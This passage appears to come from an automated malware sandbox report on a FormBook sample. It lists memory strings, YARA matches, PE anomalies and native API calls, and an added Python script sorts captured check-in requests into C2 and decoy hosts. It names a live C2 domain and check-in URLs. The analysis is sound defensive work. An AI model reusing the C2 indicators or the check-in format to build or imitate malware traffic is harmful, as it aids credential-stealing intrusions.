Source: explorer.exe, 00000005.00000000.259560137.0000000008B46000.00000002.00000001.sdmp, String found in binary or memory: http://www.sakkal.com
Source: explorer.exe, 00000005.00000000.259560137.0000000008B46000.00000002.00000001.sdmp, String found in binary or memory: http://www.sandoll.co.kr
Source: explorer.exe, 00000005.00000000.259560137.0000000008B46000.00000002.00000001.sdmp, String found in binary or memory: http://www.tiro.com
Source: explorer.exe, 00000005.00000000.259560137.0000000008B46000.00000002.00000001.sdmp, String found in binary or memory: http://www.typography.netD
Source: explorer.exe, 00000005.00000000.259560137.0000000008B46000.00000002.00000001.sdmp, String found in binary or memory: http://www.urwpp.deDPlease
Source: explorer.exe, 00000005.00000000.259560137.0000000008B46000.00000002.00000001.sdmp, String found in binary or memory: http://www.zhongyicts.com.cn
Source: 457b22da_by_Libranalysis.exe, 00000000.00000002.237432147.00000000027E3000.00000004.00000001.sdmp, String found in binary or memory: https://stackpath.bootstrapcdn.com/bootstrap/4.5.0/css/bootstrap.min.css
Source: rundll32.exe, 00000009.00000002.486836362.0000000004FD2000.00000004.00000001.sdmp, String found in binary or memory: https://vm.tiktok.com/ZMJE3suep/a8si?NZb=jdN
Source: 457b22da_by_Libranalysis.exe, 00000000.00000002.237290926.0000000002791000.00000004.00000001.sdmp, String found in binary or memory: https://www.paypal.com/cgi-bin/webscr?cmd=_s-xclick&hosted_button_id=CJU3DBQXBUQPC
Source: 457b22da_by_Libranalysis.exe, 00000000.00000002.237290926.0000000002791000.00000004.00000001.sdmp, String found in binary or memory: https://www.paypal.com/cgi-bin/webscr?cmd=_s-xclick&hosted_button_id=CJU3DBQXBUQPC5http://servermana
Source: 457b22da_by_Libranalysis.exe, 00000000.00000002.236001012.00000000009E8000.00000004.00000020.sdmp, Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>
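FormBook spreads its check-ins across the decoy list, and only one of the hosts above is the real C2 from the configuration; the Snort alerts do not tell the decoys apart from it. The Python below is an added example (not from the report, and not the Emerging Threats rule logic) that parses the captured GET requests, scores each against indicators taken from the requests on this page (a short path segment, a long base64-like first parameter, a short dash-terminated second parameter, no User-Agent, which the signature list reports separately), and labels each Host as C2, decoy or unknown using the extracted configuration. The request to www.example.com, the indicator threshold and the decoy subset are constructed assumptions.

```python
import re
from urllib.parse import urlsplit

# Subset of the extracted configuration above: the single real C2 and the decoy
# domains that actually received traffic in this run.
CONFIG = {
    "C2 list": ["www.rogegalmish.com/a8si/"],
    "decoy": ["skynetaccess.com", "thepocket-onlinelesson.xyz", "shirleyeluiz.com",
              "drisu-goalkeeping.com", "best-cleaner.com", "4520oceanviewavenue.com",
              "omfgphil.com", "boostcoachingonline.com"],
}

# Constructed raw requests: two rebuilt from the flattened captures above and one
# benign control request (www.example.com) that is not from the report.
REQUESTS = [
    "GET /a8si/?NZb=u+x8HrW8TaP2OTySFAVUaGkyVI6Qrz7itxoztY99JgBPvqcvqvs4xGCSIVWMYkPxCa9b&2dND=GVTl- HTTP/1.1\r\n"
    "Host: www.skynetaccess.com\r\nConnection: close\r\n\r\n",
    "GET /a8si/?NZb=+XN8NDZ1K2QCkRvOhUuLQIc57zcvFV8XafOJaWeGgjvpyrWV+MqtkcBEDSPdl300gZ3G&2dND=GVTl- HTTP/1.1\r\n"
    "Host: www.rogegalmish.com\r\nConnection: close\r\n\r\n",
    "GET /index.html HTTP/1.1\r\nHost: www.example.com\r\n"
    "User-Agent: Mozilla/5.0\r\nConnection: close\r\n\r\n",
]


def strip_www(host):
    host = host.lower()
    return host[4:] if host.startswith("www.") else host


def parse_request(raw):
    """Split a raw HTTP/1.x request into method, target, version and lower-cased headers."""
    head = raw.split("\r\n\r\n", 1)[0]
    lines = head.split("\r\n")
    method, target, version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        k, _, v = line.partition(":")
        headers[k.strip().lower()] = v.strip()
    return {"method": method, "target": target, "version": version, "headers": headers}


def split_query(query):
    """Manual split: urllib's parse_qs would turn the '+' inside the payload into spaces."""
    return [tuple(p.partition("=")[::2]) for p in query.split("&") if p]


def host_role(host, config=CONFIG):
    """'c2' if the host is in the C2 list, 'decoy' if in the decoy list, else 'unknown'."""
    bare = strip_www(host)
    c2 = {strip_www(u.split("/", 1)[0]) for u in config["C2 list"]}
    decoys = {strip_www(d) for d in config["decoy"]}
    return "c2" if bare in c2 else "decoy" if bare in decoys else "unknown"


def checkin_indicators(req):
    """Indicators read off the requests captured in this report, not a published rule:
    GET <short path>/?<k1>=<base64-like blob>&<k2>=<short token ending '-'>, no User-Agent."""
    url = urlsplit(req["target"])
    params = split_query(url.query)
    return {
        "get": req["method"] == "GET",
        "short_path": re.fullmatch(r"/[A-Za-z0-9]{2,8}/", url.path) is not None,
        "two_params": len(params) == 2,
        "b64_blob": len(params) >= 1
                    and re.fullmatch(r"[A-Za-z0-9+/]{40,}={0,2}", params[0][1]) is not None,
        "token_dash": len(params) == 2 and 2 <= len(params[1][1]) <= 12
                      and params[1][1].endswith("-"),
        "no_user_agent": "user-agent" not in req["headers"],
    }


def triage(raw_requests, config=CONFIG, threshold=5):
    """One verdict per request: is it a check-in, and which role does the host play."""
    out = []
    for raw in raw_requests:
        req = parse_request(raw)
        ind = checkin_indicators(req)
        score = sum(ind.values())
        host = req["headers"].get("host", "")
        out.append({"host": host, "role": host_role(host, config),
                    "checkin": score >= threshold, "score": score,
                    "hit": sorted(k for k, v in ind.items() if v)})
    return out


if __name__ == "__main__":
    for r in triage(REQUESTS):
        print("%-32s checkin=%-5s role=%-7s score=%d %s"
              % (r["host"], r["checkin"], r["role"], r["score"], ",".join(r["hit"])))
```

The role column is what matters for response: blocking every host that produced an alert wastes effort on the decoys (most of them are ordinary third-party domains that never see the traffic), while the one labelled c2 is the indicator to block and to hunt for in proxy logs.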

E-Banking Fraud:

Yara detected FormBook
Source: Yara match, File source: 00000009.00000002.481738454.00000000011E0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match, File source: 00000009.00000002.478757286.00000000008F0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match, File source: 00000004.00000002.276852950.0000000001400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match, File source: 00000000.00000002.238968916.00000000037E7000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match, File source: 00000009.00000002.480717659.0000000000D10000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match, File source: 00000004.00000002.276548151.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match, File source: 00000004.00000002.276831846.00000000013D0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match, File source: 4.2.457b22da_by_Libranalysis.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match, File source: 4.2.457b22da_by_Libranalysis.exe.400000.0.raw.unpack, type: UNPACKEDPE

          System Summary:

          barindex
Malicious sample detected (through community Yara rule)
Source: 00000009.00000002.481738454.00000000011E0000.00000004.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000009.00000002.481738454.00000000011E0000.00000004.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000009.00000002.478757286.00000000008F0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000009.00000002.478757286.00000000008F0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000004.00000002.276852950.0000000001400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000004.00000002.276852950.0000000001400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000000.00000002.238968916.00000000037E7000.00000004.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000000.00000002.238968916.00000000037E7000.00000004.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000009.00000002.480717659.0000000000D10000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000009.00000002.480717659.0000000000D10000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000004.00000002.276548151.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000004.00000002.276548151.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000004.00000002.276831846.00000000013D0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000004.00000002.276831846.00000000013D0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 4.2.457b22da_by_Libranalysis.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 4.2.457b22da_by_Libranalysis.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 4.2.457b22da_by_Libranalysis.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 4.2.457b22da_by_Libranalysis.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
PE file contains section with special chars
Source: 457b22da_by_Libranalysis.exe | Static PE information: section name: U#j;F_`
PE file has nameless sections
Source: 457b22da_by_Libranalysis.exe | Static PE information: section name:
Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe | Code function: 4_2_004181C0 NtCreateFile,
Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe | Code function: 4_2_00418270 NtReadFile,
Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe | Code function: 4_2_004182F0 NtClose,
Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe | Code function: 4_2_004183A0 NtAllocateVirtualMemory,
Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe | Code function: 4_2_0041826A NtReadFile,
Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe | Code function: 4_2_0041839A NtAllocateVirtualMemory,
Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe | Code function: 4_2_019599A0 NtCreateSection,LdrInitializeThunk,
Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe | Code function: 4_2_019595D0 NtClose,LdrInitializeThunk,
Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe | Code function: 4_2_01959910 NtAdjustPrivilegesToken,LdrInitializeThunk,
Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe | Code function: 4_2_01959540 NtReadFile,LdrInitializeThunk,
Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe | Code function: 4_2_019598F0 NtReadVirtualMemory,LdrInitializeThunk,
Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe | Code function: 4_2_01959840 NtDelayExecution,LdrInitializeThunk,
Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe | Code function: 4_2_01959860 NtQuerySystemInformation,LdrInitializeThunk,
Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe | Code function: 4_2_01959780 NtMapViewOfSection,LdrInitializeThunk,
Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe | Code function: 4_2_019597A0 NtUnmapViewOfSection,LdrInitializeThunk,
Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe | Code function: 4_2_01959FE0 NtCreateMutant,LdrInitializeThunk,
Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe | Code function: 4_2_01959710 NtQueryInformationToken,LdrInitializeThunk,
Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe | Code function: 4_2_019596E0 NtFreeVirtualMemory,LdrInitializeThunk,
Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe | Code function: 4_2_01959A00 NtProtectVirtualMemory,LdrInitializeThunk,
Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe | Code function: 4_2_01959A20 NtResumeThread,LdrInitializeThunk,
Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe | Code function: 4_2_01959A50 NtCreateFile,LdrInitializeThunk,
Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe | Code function: 4_2_01959660 NtAllocateVirtualMemory,LdrInitializeThunk,
Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe | Code function: 4_2_019599D0 NtCreateProcessEx,
Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe | Code function: 4_2_019595F0 NtQueryInformationFile,
Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe | Code function: 4_2_0195AD30 NtSetContextThread,
Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe | Code function: 4_2_01959520 NtWaitForSingleObject,
Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe | Code function: 4_2_01959950 NtQueueApcThread,
Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe | Code function: 4_2_01959560 NtWriteFile,
Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe | Code function: 4_2_019598A0 NtWriteVirtualMemory,
Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe | Code function: 4_2_01959820 NtEnumerateKey,
Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe | Code function: 4_2_0195B040 NtSuspendThread,
Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe | Code function: 4_2_0195A3B0 NtGetContextThread,
Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe | Code function: 4_2_0195A710 NtOpenProcessToken,
Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe | Code function: 4_2_01959B00 NtSetValueKey,
Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe | Code function: 4_2_01959730 NtQueryVirtualMemory,
Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe | Code function: 4_2_01959770 NtSetInformationFile,
Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe | Code function: 4_2_0195A770 NtOpenThread,
Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe | Code function: 4_2_01959760 NtOpenProcess,
Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe | Code function: 4_2_01959A80 NtOpenDirectoryObject,
Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe | Code function: 4_2_019596D0 NtCreateKey,
Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe | Code function: 4_2_01959610 NtEnumerateValueKey,
Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe | Code function: 4_2_01959A10 NtQuerySection,
Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe | Code function: 4_2_01959650 NtQueryValueKey,
Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe | Code function: 4_2_01959670 NtQueryInformationProcess,
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 9_2_04989840 NtDelayExecution,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 9_2_04989860 NtQuerySystemInformation,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 9_2_049899A0 NtCreateSection,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 9_2_049895D0 NtClose,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 9_2_04989910 NtAdjustPrivilegesToken,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 9_2_04989540 NtReadFile,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 9_2_049896D0 NtCreateKey,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 9_2_049896E0 NtFreeVirtualMemory,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 9_2_04989650 NtQueryValueKey,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 9_2_04989A50 NtCreateFile,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 9_2_04989660 NtAllocateVirtualMemory,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 9_2_04989780 NtMapViewOfSection,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 9_2_04989FE0 NtCreateMutant,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 9_2_04989710 NtQueryInformationToken,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 9_2_049898A0 NtWriteVirtualMemory,
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 9_2_049898F0 NtReadVirtualMemory,
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 9_2_04989820 NtEnumerateKey,
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 9_2_0498B040 NtSuspendThread,
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 9_2_049899D0 NtCreateProcessEx,
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 9_2_049895F0 NtQueryInformationFile,
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 9_2_0498AD30 NtSetContextThread,
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 9_2_04989520 NtWaitForSingleObject,
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 9_2_04989950 NtQueueApcThread,
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 9_2_04989560 NtWriteFile,
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 9_2_04989A80 NtOpenDirectoryObject,
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 9_2_04989610 NtEnumerateValueKey,
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 9_2_04989A10 NtQuerySection,
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 9_2_04989A00 NtProtectVirtualMemory,
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 9_2_04989A20 NtResumeThread,
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 9_2_04989670 NtQueryInformationProcess,
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 9_2_0498A3B0 NtGetContextThread,
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 9_2_049897A0 NtUnmapViewOfSection,
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 9_2_0498A710 NtOpenProcessToken,
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 9_2_04989B00 NtSetValueKey,
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 9_2_04989730 NtQueryVirtualMemory,
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 9_2_04989770 NtSetInformationFile,
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 9_2_0498A770 NtOpenThread,
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 9_2_04989760 NtOpenProcess,
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 9_2_009081C0 NtCreateFile,
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 9_2_009082F0 NtClose,
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 9_2_00908270 NtReadFile,
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 9_2_009083A0 NtAllocateVirtualMemory,
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 9_2_0090826A NtReadFile,
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 9_2_0090839A NtAllocateVirtualMemory,
Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe | Code function: String function: 0191B150 appears 32 times
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: String function: 0494B150 appears 35 times
Source: 457b22da_by_Libranalysis.exe | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 457b22da_by_Libranalysis.exe | Binary or memory string: OriginalFilename vs 457b22da_by_Libranalysis.exe
Source: 457b22da_by_Libranalysis.exe, 00000000.00000002.237290926.0000000002791000.00000004.00000001.sdmp | Binary or memory string: OriginalFilenameSimpleUI.dll( vs 457b22da_by_Libranalysis.exe
Source: 457b22da_by_Libranalysis.exe, 00000000.00000002.238739853.0000000002CA0000.00000004.00000001.sdmp | Binary or memory string: OriginalFilenameDynamicPartitionEnumeratorForIndexRangeAbstract.exeF vs 457b22da_by_Libranalysis.exe
Source: 457b22da_by_Libranalysis.exe, 00000000.00000002.238739853.0000000002CA0000.00000004.00000001.sdmp | Binary or memory string: l,\\StringFileInfo\\000004B0\\OriginalFilename vs 457b22da_by_Libranalysis.exe
Source: 457b22da_by_Libranalysis.exe, 00000000.00000002.238968916.00000000037E7000.00000004.00000001.sdmp | Binary or memory string: OriginalFilenameDSASignature.dll@ vs 457b22da_by_Libranalysis.exe
Source: 457b22da_by_Libranalysis.exe, 00000000.00000002.236001012.00000000009E8000.00000004.00000020.sdmp | Binary or memory string: OriginalFilenameclr.dllT vs 457b22da_by_Libranalysis.exe
Source: 457b22da_by_Libranalysis.exe, 00000004.00000002.277387221.0000000001B9F000.00000040.00000001.sdmp | Binary or memory string: OriginalFilenamentdll.dllj% vs 457b22da_by_Libranalysis.exe
Source: 457b22da_by_Libranalysis.exe, 00000004.00000000.234003452.0000000000E58000.00000002.00020000.sdmp | Binary or memory string: OriginalFilenameDynamicPartitionEnumeratorForIndexRangeAbstract.exeF vs 457b22da_by_Libranalysis.exe
Source: 457b22da_by_Libranalysis.exe | Binary or memory string: OriginalFilenameDynamicPartitionEnumeratorForIndexRangeAbstract.exeF vs 457b22da_by_Libranalysis.exe
Source: 457b22da_by_Libranalysis.exe | Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
Source: 00000009.00000002.481738454.00000000011E0000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000009.00000002.481738454.00000000011E0000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000009.00000002.478757286.00000000008F0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000009.00000002.478757286.00000000008F0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000004.00000002.276852950.0000000001400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000004.00000002.276852950.0000000001400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000000.00000002.238968916.00000000037E7000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000000.00000002.238968916.00000000037E7000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000009.00000002.480717659.0000000000D10000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000009.00000002.480717659.0000000000D10000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000004.00000002.276548151.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000004.00000002.276548151.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000004.00000002.276831846.00000000013D0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000004.00000002.276831846.00000000013D0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 4.2.457b22da_by_Libranalysis.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 4.2.457b22da_by_Libranalysis.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 4.2.457b22da_by_Libranalysis.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 4.2.457b22da_by_Libranalysis.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 457b22da_by_Libranalysis.exe | Static PE information: Section: U#j;F_` ZLIB complexity 1.00031723159
Source: classification engine | Classification label: mal100.troj.evad.winEXE@7/1@12/8
Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe | File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\457b22da_by_Libranalysis.exe.log
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6084:120:WilError_01
Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe | Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\Windows\explorer.exe | File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\explorer.exe | Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
Source: 457b22da_by_Libranalysis.exe, 00000000.00000002.237432147.00000000027E3000.00000004.00000001.sdmp | Binary or memory string: Select * from Clientes WHERE id=@id;;
